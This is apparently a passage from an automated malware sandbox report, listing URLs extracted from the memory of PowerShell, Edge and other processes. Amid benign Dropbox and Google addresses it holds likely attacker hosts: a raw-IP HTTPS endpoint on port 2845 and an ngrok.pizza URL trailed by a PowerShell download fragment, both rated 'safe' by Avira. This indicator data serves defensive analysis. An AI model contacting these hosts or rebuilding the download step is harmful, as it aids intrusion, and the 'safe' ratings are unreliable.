00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.dropbox.com/playlist/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://onedrive.live.com/pickerpowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA98E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA9962A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA99991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.dropbox.compowershell.exe, 00000003.00000002.2355291636.000001DA97D96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201114FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropbox.com/scl/fi/uXpowershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://chrome.google.com/webstoremsedge.exe, 00000006.00000002.2328122443.0000288402220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421498290.00001D540017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://go.micropowershell.exe, 00000003.00000002.2355291636.000001DA98E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA98715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201114FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.ver)svchost.exe, 00000007.00000002.3359958364.0000020F0F600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachifontdrvhost.exe, 0000001B.00000003.2716818817.0000000003A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.symauth.com/cps0(678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.dropbox.com/v/s/playlist/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www-env.dropbox-dns.compowershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://permanently-removed.invalid/OAuthLoginmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://help.dropbox.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://msn.cn/msedge.exe, 00000006.00000002.2329082219.0000288402594000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421849654.00001D5400300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.symauth.com/rpa00678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/recaptcha/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000006.00000002.2328122443.0000288402220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421498290.00001D540017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopkernelbasentdllkernel32GetProcessMitigatiofontdrvhost.exe, 0000001B.00000003.2788101014.00000000059A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d-UseBasicParspowershell.exe, 00000003.00000002.2354311529.000001DA95A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2354857200.000001DA95C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2354249803.000001DA959F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2354585063.000001DA95AFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2390109279.000001DAAFC62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://dl-web.dropbox.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://app.hellofax.com/powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://cfl.dropboxstatic.com/static/powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopxfontdrvhost.exe, 0000001B.00000002.2789038269.000000000327C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.dropbox.com/service_worker.jspowershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34dXpowershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000006.00000003.2257027698.0000288402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.2256746212.0000288402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407997521.00001D5400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2407823387.00001D5400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
